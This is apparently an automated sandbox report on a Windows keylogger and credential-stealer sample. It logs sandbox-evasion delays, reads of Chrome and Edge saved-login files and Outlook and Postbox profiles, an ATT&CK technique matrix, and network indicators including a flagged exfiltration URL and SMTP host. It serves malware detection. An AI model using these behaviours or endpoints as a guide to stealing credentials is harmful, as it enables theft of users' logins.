                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595625Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595515Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595406Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595295Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595187Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595078Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 594969Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 594844Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 594734Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 594625Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeWindow / User API: threadDelayed 7163Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeWindow / User API: threadDelayed 2691Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -599890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 5896Thread sleep count: 7163 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 5896Thread sleep count: 2691 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -599781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -599672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -599562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -599453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -599343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -599234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -599125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -599015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -598906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -598797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -598687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -598578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -598468s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -598359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -598250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -598140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -598031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -597922s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -597812s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -597703s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -597593s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -597484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -597375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -597265s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -597156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -597047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -596937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -596828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -596718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -596609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -596499s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -596390s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -596281s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -596172s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -596062s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -595953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -595843s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -595734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -595625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -595515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -595406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -595295s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -595187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -595078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -594969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -594844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -594734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428Thread sleep time: -594625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599890Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599562Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599453Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599343Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599234Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599125Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599015Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598906Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598797Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598687Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598468Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598359Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598250Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598140Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598031Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597922Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597812Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597703Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597593Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597484Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597375Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597265Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597156Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597047Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596937Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596828Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596718Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596609Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596499Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596390Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596281Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596172Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596062Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595953Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595843Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595734Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595625Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595515Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595406Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595295Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595187Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595078Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 594969Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 594844Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 594734Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 594625Jump to behavior
                      Source: Zarefy4bOs.exe, 00000000.00000002.4458012480.0000000000A75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_02767988 LdrInitializeThunk,0_2_02767988
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeQueries volume information: C:\Users\user\Desktop\Zarefy4bOs.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: Zarefy4bOs.exe, type: SAMPLE
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4461938228.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: Zarefy4bOs.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: Zarefy4bOs.exe, type: SAMPLE
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4461938228.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                      Command and Scripting Interpreter
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      Query Registry
                      Remote Services1
                      Email Collection
                      11
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
                      Virtualization/Sandbox Evasion
                      LSASS Memory1
                      Security Software Discovery
                      Remote Desktop Protocol11
                      Archive Collected Data
                      1
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      Deobfuscate/Decode Files or Information
                      Security Account Manager1
                      Process Discovery
                      SMB/Windows Admin Shares1
                      Data from Local System
                      1
                      Ingress Tool Transfer
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Obfuscated Files or Information
                      NTDS31
                      Virtualization/Sandbox Evasion
                      Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets1
                      Application Window Discovery
                      SSHKeylogging23
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                      System Network Configuration Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Zarefy4bOs.exe66%ReversingLabsByteCode-MSIL.Keylogger.NotFound
                      Zarefy4bOs.exe68%VirustotalBrowse
                      Zarefy4bOs.exe100%AviraHEUR/AGEN.1307591
                      Zarefy4bOs.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      reallyfreegeoip.org1%VirustotalBrowse
                      scratchdreams.tk6%VirustotalBrowse
                      checkip.dyndns.com0%VirustotalBrowse
                      checkip.dyndns.org0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://checkip.dyndns.org/0%URL Reputationsafe
                      http://checkip.dyndns.org/q0%URL Reputationsafe
                      http://reallyfreegeoip.org0%URL Reputationsafe
                      https://reallyfreegeoip.org0%URL Reputationsafe
                      http://checkip.dyndns.org0%URL Reputationsafe
                      http://checkip.dyndns.com0%URL Reputationsafe
                      https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                      https://scratchdreams.tk100%Avira URL Cloudmalware
                      https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
                      https://reallyfreegeoip.org/xml/102.129.152.231$0%Avira URL Cloudsafe
                      https://reallyfreegeoip.org/xml/102.129.152.2310%Avira URL Cloudsafe
                      http://scratchdreams.tk100%Avira URL Cloudmalware
                      https://scratchdreams.tk/_send_.php?TS1%VirustotalBrowse
                      https://scratchdreams.tk15%VirustotalBrowse
                      http://scratchdreams.tk6%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      208.91.199.225
                      truefalse
                        high
                        reallyfreegeoip.org
                        104.21.67.152
                        truefalseunknown
                        scratchdreams.tk
                        104.21.27.85
                        truefalseunknown
                        checkip.dyndns.com
                        193.122.6.168
                        truefalseunknown
                        checkip.dyndns.org
                        unknown
                        unknowntrueunknown
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        unknown
                        https://scratchdreams.tk/_send_.php?TSfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://reallyfreegeoip.org/xml/102.129.152.231false
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://us2.smtp.mailhostbox.comZarefy4bOs.exe, 00000000.00000002.4461938228.0000000002B58000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://checkip.dyndns.org/qZarefy4bOs.exefalse
                          • URL Reputation: safe
                          unknown
                          https://scratchdreams.tkZarefy4bOs.exefalse
                          • 15%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          unknown
                          http://reallyfreegeoip.orgZarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.000000000295C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.orgZarefy4bOs.exe, 00000000.00000002.4461938228.0000000002987000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://checkip.dyndns.orgZarefy4bOs.exe, 00000000.00000002.4461938228.0000000002935000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002987000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://checkip.dyndns.comZarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameZarefy4bOs.exe, 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://reallyfreegeoip.org/xml/102.129.152.231$Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002987000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://scratchdreams.tkZarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A49000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 6%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            unknown
                            https://reallyfreegeoip.org/xml/Zarefy4bOs.exefalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            104.21.67.152
                            reallyfreegeoip.orgUnited States
                            13335CLOUDFLARENETUSfalse
                            193.122.6.168
                            checkip.dyndns.comUnited States
                            31898ORACLE-BMC-31898USfalse
                            208.91.199.225
                            us2.smtp.mailhostbox.comUnited States
                            394695PUBLIC-DOMAIN-REGISTRYUSfalse
                            104.21.27.85
                            scratchdreams.tkUnited States
                            13335CLOUDFLARENETUSfalse
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1422062
                            Start date and time:2024-04-08 10:02:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 48s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:4
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Zarefy4bOs.exe
                            renamed because original name is a hash value
